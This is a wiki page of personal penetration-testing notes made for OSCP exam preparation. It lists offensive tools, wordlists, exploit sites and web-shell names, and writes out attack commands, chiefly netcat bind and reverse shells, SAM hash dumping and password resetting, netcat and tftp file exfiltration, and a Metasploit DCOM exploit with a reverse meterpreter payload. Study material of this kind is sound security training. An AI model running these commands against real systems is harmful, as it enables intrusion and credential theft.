Hacking Notes

Aus Bitbull Wiki
Wechseln zu: Navigation, Suche

disclaimer

i wrote this notes while preparing myself for the "Offensive Security Certified Professional" exam.
scripts, links and infos on this site are for educational purposes only.
a knife is not bad, but you can do bad things with it.
i hope this site help others to improve their security skills.
enjoy it ...

security sites

Offensive Security
security trainings, creators of backtrack linux
homepage: http://www.offensive-security.com
SecurityFocus
official collection of voluns
homepage: http://www.securityfocus.com
darknet
useful audit tools
homepage: http://www.darknet.org.uk
CVE
Common Vulnerabilities and Exposures
homepage: http://cve.mitre.org/
insecure
top 100 security tools, and lot of other info and tools
homepage:http://sectools.org

protecting privacy while surfing

distributed network to hide your web access
also known as tor proxy
homepage: http://www.anonymox.net/

lists of free proxy servers

http://proxy.speedtest.at/proxyOnlyAnonymous.php
http://www.hidemyass.com/proxy-list
http://www.google.com/search?q=anonymous proxy server list
for i in $(cat proxy.txt)
do 
   curl -m5 -x $i http://www.bitbull.ch/wanip.php >/dev/null 2>&1 && echo "$i"
done

anonym emailing

one time email addresses
http://www.mailinator.com
http://www.yopmail.com
https://www.guerrillamail.com

information gathering

using google

google advanced search operators
http://www.googleguide.com/advanced_operators.html
google hacking database, a nice place
http://www.hackersforcharity.org/ghdb/
http://www.exploit-db.com/google-dorks/

tools

web

./cms-explorer.pl -url http://mybooks.ch -type drupal

./revhosts pig getmail stiftung-buehl.ch
./revhosts pig Findsubdomains stiftung-buehl.ch
./revhosts pig vhh bitbull.ch #find all virtual hosts on this server



online domains databases
MAC-Adressen Hersteller Verzeichnis
homepage: http://standards.ieee.org/regauth/oui/index.shtml
file: http://standards.ieee.org/regauth/oui/oui.txt
find all active ips in a subnet
arp-scan -I eth0 192.168.1.0/24

scanning

nmap
hervorragender portscanner, ist immer auf dem neussten stand
homepage: http://nmap.org
install nmap by rpm: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | egrep 'nmap-[1-9].*i386.rpm' | cut -d\" -f6 | tail -1)
install nmap frontend zenmap by: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | grep zenmap | cut -d\" -f6 | tail -1)
autoscan
cool scanner, has a nice and easy customizable extension interface
homepage: http://sourceforge.net/projects/autoscan/
nessus
great security scanner, must have
homepage: http://www.nessus.org
nikto
Nikto is an web server scanner which performs comprehensive tests against web servers for multiple security items.
homepage: http://www.cirt.net/code/nikto.shtml

password attacking

bruteforce tools

hydra
remote bruteforce password cracker for nearly all protocols :)
homepage: http://freeworld.thc.org/releases.php
rainbow tables
crack hashes faster by using rainbow tables
see: http://en.wikipedia.org/wiki/Rainbow_table
web interface: http://cracker.offensive-security.com/

password lists

wyd
generates word lists from given web content
homepage: http://www.remote-exploit.org/codes_wyd.html
bugmenot
free user accounts for many sites
homepage: http://www.bugmenot.com
some password lists
http://www.milw0rm.com/mil-dic.php
ftp://ftp.ox.ac.uk/pub/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.theargon.com/achilles/wordlists/
http://theargon.com/achilles/wordlists/theargonlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
http://www.securinfos.info/wordlists_dictionnaires.php
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.insidepro.com/eng/download.shtml
http://www.word-list.com/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
http://wordlist.sourceforge.net/

password dumper

pwdump
dump winrows passwords
see: http://en.wikipedia.org/wiki/Pwdump

physical access

linux
  • boot backtrack3
  • copy, read, write /etc/shadow
  • use jack the ripper to crack it
get windows password hashes
  • boot backtrack3
  • mount ntfs filesystem
mount
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
  • dump the syskey bootkey from windows system hive
bkhive /mnt/hda1/WINNT/system32/config/system system.txt
  • dump password hashes
samdump2 /mnt/hda1/WINNT/system32/config/SAM system.txt > hashes.txt
set windows passwords
  • boot backtrack3
  • mount ntfs filesystem
mount
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
  • write new password
chntpw /mnt/hda1/WINNT/system32/config/SAM

arp poisoning

ettercap
nice cli/gui tool fof arp poisoning, man in the middle, dns poisoning, traffic modification ...
homepage: http://ettercap.sourceforge.net/
cain and abel
windows tool like ettercap, windows guys like it
homepage: http://www.oxid.it/

traffic analyzer

wire shark
well known gui/cli traffic analyzer, imports also tcpdump files
homepage: http://www.wireshark.org/
tcpdump
console traffic analizer
homepage: http://sourceforge.net/projects/tcpdump/
iftop
tool to monitor and trace bandwith issues
homepage: http://www.ex-parrot.com/~pdw/iftop/
WebScarab
great http traffic analizer
homepage: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
WebGoat
insecure webapp to teach security lessons
homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

port forwarding

ssh reverse tunnel
#build the ssh reverse tunnel
user@destination$ ssh -R 2222:localhost:22 middleuser@middle
user@destination$ ssh -N -f -R 2222:localhost:22 middleuser@middle
#connect to the ssh reverse tunnel and jump to destination
middleuser@middle$ ssh destinationuser@localhost -p2222
user@notebook$ ssh destinationuser@middle -p 2222


ssh port forwarding
ssh -g -L 80:127.0.0.1:3128 jump@zen.bitbull.ch -p23
ssh -g -L local_port:remote_host:remote_port  user@dst_host -p23
  -g  >  Allows remote hosts to connect to local forwarded ports
  -L  >  [bind_address:]port:host:hostport
  -p  >  use different port for ssh connection
rinetd

einfacher port forwarder für linux und windows
homepage: http://www.boutell.com/rinetd/

stunnel

traffic redirection via ssl tunnel
homepage: http://www.stunnel.org/
zB: MUA -> localhost:110 -> stunnel( localhost:110 -> destination:995)

proxytunnel

building tunnels over http proxies for ssh, pop3 ...
homepage: http://proxytunnel.sourceforge.net/

ssh reverse tunnel example

1) add user account on jumphost

root@jumphost:~# useradd support1
root@jumphost:~# passwd support1

2) send login and host data to external supporter

  TO: supporter@external-support.com
  Subject: we need support ... now !!!
  ---
  hi mate
  our production webserver is broken, I'll pick you up on the internet at 09:00
  we meet us here:
  ssh support1@jumphost.internet.com
  # PW: secr3t.
  start this comand: screen -S support1
  ---

3) go and pickup the waiting supporter at jumphost

 me@blackhole:~$ ssh -R 2222:localhost:22 support1@jumphost.internet.com
 # PW: think
 support1@jumphost:~$ screen -ls # list all screen sessions
 support1@jumphost:~$ screen -x support1 # pick up the supporter (shared screen)
 support1@jumphost:~$ ssh -p2222 me@localhost # take you and supporter back to blackhole (by reverse tunnel)
 me@blackhole:~$ ssh admin@crapy
 admin@crapy:~$ sudo su -
 root@crapy:~# echo "now, its your turn, fix the server ..."

4) when work ist done: close the tunnel. if you are not sure, do this:

root@jumphost:~# usermod -L support1 # lock the account
root@jumphost:~# pkill -9 -u support1 # be sure all sessions are killed

this is the network map for the example above:
http://www.bitbull.ch/dl/pics/SSH-ReverseTunnel.png

exploiting

milw0rm
god collection of exploits and hacking background
homepage: http://www.milw0rm.com/
metasploit
great exploiting framework
homepage: http://www.metasploit.com/
install framework3 on fC6: http://www.bitbull.ch/dl/scripts/install-framework3-fc6.sh

use db_autopwn

./msfconsole
msf> load db_sqlite3
msf> db_create
db_nmap -sV -PN -T4 192.168.0.111
db_autopwn -t
nmap -iL /root/ip.txt -PN -T4 -sV --host-timeout 5min -p21,22,25,80,135,139,110,143,445,443 -oX /tmp/scan.xml

use msfconsole

./msfconsole
msf > search exploits rpc
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > search payloads windows.*reverse
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set RHOST 192.168.0.111
msf exploit(ms03_026_dcom) > set LHOST 192.168.0.151
msf exploit(ms03_026_dcom) > set LPORT 55555
msf exploit(ms03_026_dcom) > set

Global
======

No entries in data store.

Module: windows/dcerpc/ms03_026_dcom
====================================

  Name                             Value                                                     
  ----                             -----                                                     
  AutoLoadStdapi                   true                                                      
  AutoRunScript                                                                              
  ConnectTimeout                   10                                                        
  DCERPC::ReadTimeout              0                                                         
  DCERPC::fake_bind_multi          true                                                      
  DCERPC::fake_bind_multi_append   0                                                         
  DCERPC::fake_bind_multi_prepend  0                                                         
  DCERPC::max_frag_size            4096                                                      
  DCERPC::smb_pipeio               rw                                                        
  DLL                              /pentest/exploits/framework3/data/meterpreter/metsrv.dll  
  EXITFUNC                         thread                                                    
  EnableContextEncoding            false                                                     
  LHOST                            192.168.0.151                                           
  LPORT                            55555                                                     
  PAYLOAD                          windows/meterpreter/reverse_tcp                           
  RHOST                            192.168.0.111                                           
  RPORT                            135                                                       
  SSL                              false                                                     
  TARGET                           0                                                         
  TCP::max_send_size               0                                                         
  TCP::send_delay                  0                                                         
  WfsDelay                         0                                                         

msf exploit(ms03_026_dcom) > exploit

backdoors

php

some nice backdoors for unix, php
google: c99.txt r57.txt c100.txt
http://www.google.ch/search?hl=de&q=c99.txt+r57.txt+c100.txt+filetype%3Atxt

windows trojans

optix pro / beast / bifrost
some interesting windows trojans
spybot
irc based trojan
insider
http based trojan, takes instructions by web server
rxbot
irc based, self distributing

div tools

Back Track Linux Distro
live linux distro for security audit
http://www.remote-exploit.org/backtrack.html
chkrootkit
locally check for root kits
homepage: http://www.chkrootkit.org/
darkc0de
interesting tools and scripts
http://darkc0de.com/
Lynis
check default config and security settings on unix box
homepage: http://www.rootkit.nl/projects/lynis.html

netcat notes

simple chat
dst) nc -vv -l 4444
src) nc 192.168.8.110 4444
file transfer
dst) nc -l 4444 > chris.leo
src) cat chris.leo | nc 192.168.9.10 444
src) type chris.leo | nc.exe 192.168.9.10 444
bind shell
dst) nc -l 4444 -e cmd
src) nc 192.168.8.110 4444
reverse shell
dst) nc -l 4444
src) nc -e cmd 192.168.8.110 4444
port scanner
nc -z -w1  -v 192.168.9.10 4444-4445
banner grabber
nc -vv 192.168.9.110 22

tftp notes

get files (-i is only for win)
tftp -i 1.2.3.4 GET nc.exe
put files (-i is only for win)
tftp 2.3.4.5 PUT sam



wireless

links

web conversion
convert wpa and wep key into words
homepage: http://www.latinsud.com/wepconv.html
aircrack-ng faq
a must
homepage: http://aircrack-ng.org/doku.php?id=faq